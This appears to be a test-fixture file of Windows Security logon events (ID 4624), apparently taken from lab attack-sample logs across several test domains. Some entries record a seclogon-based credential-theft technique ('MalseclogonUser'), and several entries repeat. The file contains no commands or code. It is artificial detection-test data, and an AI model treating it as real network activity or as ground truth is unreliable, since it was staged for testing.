+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-05-01T08:41:47.653255+04:00,1651380107.653255,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 21369
+
+
+
+
+ Security
+ wind10.winlab.local
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-81107902-1099128984-1836738286-500
+ Administrator
+ WINLAB.LOCAL
+ 0x821aab
+ 3
+ Kerberos
+ Kerberos
+ -
+ 59CEFB69-4F9D-7486-C449-471E00B814E3
+ -
+ -
+ 0
+ 0x0
+ -
+ 192.168.1.219
+ 63652
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-05-01T08:41:37.642369+04:00,1651380097.642369,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 21367
+
+
+
+
+ Security
+ wind10.winlab.local
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-81107902-1099128984-1836738286-500
+ Administrator
+ WINLAB.LOCAL
+ 0x820d61
+ 3
+ Kerberos
+ Kerberos
+ -
+ 59CEFB69-4F9D-7486-C449-471E00B814E3
+ -
+ -
+ 0
+ 0x0
+ -
+ 192.168.1.219
+ 63640
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2019-11-15T12:19:17.134469+04:00,1573805957.134469,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,127.0.0.1,-,alice.insecurebank.local,Security,"
+
+
+
+
+ 4624
+ 1
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 25049
+
+
+
+
+ Security
+ alice.insecurebank.local
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-7
+ ANONYMOUS LOGON
+ NT AUTHORITY
+ 0x1d12916
+ 3
+ NtLmSsp
+ NTLM
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V1
+ 128
+ 0x0
+ -
+ 127.0.0.1
+ 59336
+ %%1833
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 769798
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x85516e
+ 3
+ Kerberos
+ Kerberos
+ -
+ 063B0961-D1B7-6D2C-1FF3-98764C4FAC9D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 53668
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-17T14:57:44.272505+04:00,1600340264.272505,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 769794
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-500
+ Administrator
+ 3B
+ 0x853237
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 49959
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2019-02-02T13:17:27.629413+04:00,1549099047.629413,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,::1,-,ICORP-DC.internal.corp,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 65971
+
+
+
+
+ Security
+ ICORP-DC.internal.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ ICORP-DC$
+ INTERNAL.CORP
+ 0x24db24
+ 3
+ Kerberos
+ Kerberos
+ -
+ 5A66FDFF-B4E8-5133-53A9-72A5DE1C31FB
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50152
+ %%1840
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2019-02-02T13:17:23.193671+04:00,1549099043.193671,4624,EXCHANGE$,ICORP,3,NtLmSsp,192.168.111.87,EXCHANGE,ICORP-DC.internal.corp,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 65969
+
+
+
+
+ Security
+ ICORP-DC.internal.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-2895268558-4179327395-2773671012-1108
+ EXCHANGE$
+ ICORP
+ 0x24daa6
+ 3
+ NtLmSsp
+ NTLM
+ EXCHANGE
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 0
+ 0x0
+ -
+ 192.168.111.87
+ 58128
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2019-02-02T13:17:22.562534+04:00,1549099042.562534,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,127.0.0.1,-,ICORP-DC.internal.corp,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 65967
+
+
+
+
+ Security
+ ICORP-DC.internal.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ ICORP-DC$
+ INTERNAL.CORP
+ 0x24c879
+ 3
+ Kerberos
+ Kerberos
+ -
+ 94BA67EA-8490-3C86-6DB7-DF74C9AA4449
+ -
+ -
+ 0
+ 0x0
+ -
+ 127.0.0.1
+ 50151
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 10113
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x2e4ce
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x38f87e
+ 9
+ seclogo
+ Negotiate
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1b90
+ C:\Windows\System32\svchost.exe
+ ::1
+ 0
+ %%1833
+ -
+ l
+ o
+ %%1843
+ 0x0
+ %%1843
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2982101
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x73b44c
+ 3
+ Kerberos
+ Kerberos
+ -
+ E8C9AC4A-31FC-C37F-B4D7-B3217C608858
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 64849
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2021-12-12T21:57:52.499428+04:00,1639331872.499428,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2982097
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-101606
+ lgrove
+ 3B
+ 0x738cf9
+ 3
+ NtLmSsp
+ NTLM
+ 04246W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.19
+ 50616
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2021-12-12T21:57:52.375084+04:00,1639331872.375084,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2982092
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-101606
+ lgrove
+ 3B
+ 0x738ce4
+ 3
+ NtLmSsp
+ NTLM
+ 04246W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.19
+ 50614
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2021-12-12T21:57:52.366793+04:00,1639331872.366793,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2982089
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-101606
+ lgrove
+ 3B
+ 0x738afd
+ 3
+ NtLmSsp
+ NTLM
+ 04246W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.19
+ 50613
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2021-12-12T21:57:52.313673+04:00,1639331872.313673,4624,lgrove,THREEBEESCO.COM,3,Kerberos,172.16.66.19,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2982084
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-101606
+ lgrove
+ THREEBEESCO.COM
+ 0x738ae4
+ 3
+ Kerberos
+ Kerberos
+ -
+ DCED4BA6-CF24-37EF-0627-B0E4EED7F565
+ -
+ -
+ 0
+ 0x0
+ -
+ 172.16.66.19
+ 50609
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 329918
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x53ca2
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 9
+ seclogo
+ Negotiate
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1bc4
+ C:\Windows\System32\svchost.exe
+ ::1
+ 0
+ %%1833
+ -
+ MalseclogonUser
+ MalseclogonDomain
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-05-01T08:42:00.800072+04:00,1651380120.800072,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 21373
+
+
+
+
+ Security
+ wind10.winlab.local
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-81107902-1099128984-1836738286-500
+ Administrator
+ WINLAB.LOCAL
+ 0x82215a
+ 3
+ Kerberos
+ Kerberos
+ -
+ 59CEFB69-4F9D-7486-C449-471E00B814E3
+ -
+ -
+ 0
+ 0x0
+ -
+ 192.168.1.219
+ 63652
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-05-01T08:41:54.272334+04:00,1651380114.272334,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 21371
+
+
+
+
+ Security
+ wind10.winlab.local
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-81107902-1099128984-1836738286-500
+ Administrator
+ WINLAB.LOCAL
+ 0x821f28
+ 3
+ Kerberos
+ Kerberos
+ -
+ 59CEFB69-4F9D-7486-C449-471E00B814E3
+ -
+ -
+ 0
+ 0x0
+ -
+ 192.168.1.219
+ 63652
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-05-01T08:41:47.653255+04:00,1651380107.653255,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 21369
+
+
+
+
+ Security
+ wind10.winlab.local
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-81107902-1099128984-1836738286-500
+ Administrator
+ WINLAB.LOCAL
+ 0x821aab
+ 3
+ Kerberos
+ Kerberos
+ -
+ 59CEFB69-4F9D-7486-C449-471E00B814E3
+ -
+ -
+ 0
+ 0x0
+ -
+ 192.168.1.219
+ 63652
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-05-01T08:41:37.642369+04:00,1651380097.642369,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 21367
+
+
+
+
+ Security
+ wind10.winlab.local
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-81107902-1099128984-1836738286-500
+ Administrator
+ WINLAB.LOCAL
+ 0x820d61
+ 3
+ Kerberos
+ Kerberos
+ -
+ 59CEFB69-4F9D-7486-C449-471E00B814E3
+ -
+ -
+ 0
+ 0x0
+ -
+ 192.168.1.219
+ 63640
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2019-11-15T12:19:17.134469+04:00,1573805957.134469,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,127.0.0.1,-,alice.insecurebank.local,Security,"
+
+
+
+
+ 4624
+ 1
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 25049
+
+
+
+
+ Security
+ alice.insecurebank.local
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-7
+ ANONYMOUS LOGON
+ NT AUTHORITY
+ 0x1d12916
+ 3
+ NtLmSsp
+ NTLM
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V1
+ 128
+ 0x0
+ -
+ 127.0.0.1
+ 59336
+ %%1833
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2171296
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x21aadb8
+ 3
+ Kerberos
+ Kerberos
+ -
+ 860D1189-6C67-C57B-59ED-C0676A052019
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 62863
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-02T15:47:57.263194+04:00,1599047277.263194,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2171295
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x21aad4a
+ 3
+ Kerberos
+ Kerberos
+ -
+ 860D1189-6C67-C57B-59ED-C0676A052019
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 62862
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-02T15:47:57.252932+04:00,1599047277.252932,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2171294
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x21aa47f
+ 3
+ Kerberos
+ Kerberos
+ -
+ 27FCE179-F80F-F6A6-7DF4-C247E783B072
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 62860
+ %%1840
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-02T15:47:48.959767+04:00,1599047268.959767,4624,a-jbrown,THREEBEESCO.COM,3,Kerberos,172.16.66.142,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2171292
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-1106
+ a-jbrown
+ THREEBEESCO.COM
+ 0x21a8c9a
+ 3
+ Kerberos
+ Kerberos
+ -
+ 467413FE-B054-D9AE-C758-B41105A3ECA9
+ -
+ -
+ 0
+ 0x0
+ -
+ 172.16.66.142
+ 60726
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-02T15:47:48.842119+04:00,1599047268.842119,4624,a-jbrown,THREEBEESCO.COM,3,Kerberos,172.16.66.142,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2171291
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-1106
+ a-jbrown
+ THREEBEESCO.COM
+ 0x21a8c80
+ 3
+ Kerberos
+ Kerberos
+ -
+ 467413FE-B054-D9AE-C758-B41105A3ECA9
+ -
+ -
+ 0
+ 0x0
+ -
+ 172.16.66.142
+ 60728
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-02T15:47:48.823276+04:00,1599047268.823276,4624,a-jbrown,3B,3,NtLmSsp,172.16.66.142,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2171290
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-1106
+ a-jbrown
+ 3B
+ 0x21a8c68
+ 3
+ NtLmSsp
+ NTLM
+ 04246W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.142
+ 60726
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2019-05-11T21:10:10.889320+04:00,1557594610.88932,4624,IEUser,IEWIN7,9,seclogo,::1,,IEWIN7,Security,"
+
+
+
+
+ 4624
+ 0
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 18206
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0x1371b
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0x1bbdce
+ 9
+ seclogo
+ Negotiate
+
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x3c8
+ C:\Windows\System32\svchost.exe
+ ::1
+ 0
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 769798
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x85516e
+ 3
+ Kerberos
+ Kerberos
+ -
+ 063B0961-D1B7-6D2C-1FF3-98764C4FAC9D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 53668
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-17T14:57:44.272505+04:00,1600340264.272505,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 769794
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-500
+ Administrator
+ 3B
+ 0x853237
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 49959
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768628
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x32a0d3
+ 3
+ Kerberos
+ Kerberos
+ -
+ 6747BCF0-DBAA-F21C-878B-EB339B03FA80
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50441
+ %%1840
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768627
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x329baa
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50443
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768622
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x320935
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50438
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768621
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-7
+ ANONYMOUS LOGON
+ NT AUTHORITY
+ 0x31ff89
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V1
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 49707
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1843
+
+"
+2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768620
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-7
+ ANONYMOUS LOGON
+ NT AUTHORITY
+ 0x31ff6e
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V1
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 49707
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1843
+
+"
+2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768619
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x31fb1a
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50437
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768618
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x31daf6
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50436
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 137225
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x79e59
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x1cd964
+ 2
+ Chrome
+ Negotiate
+ MSEDGEWIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1358
+ C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x1cd8f6
+ %%1843
+
+"
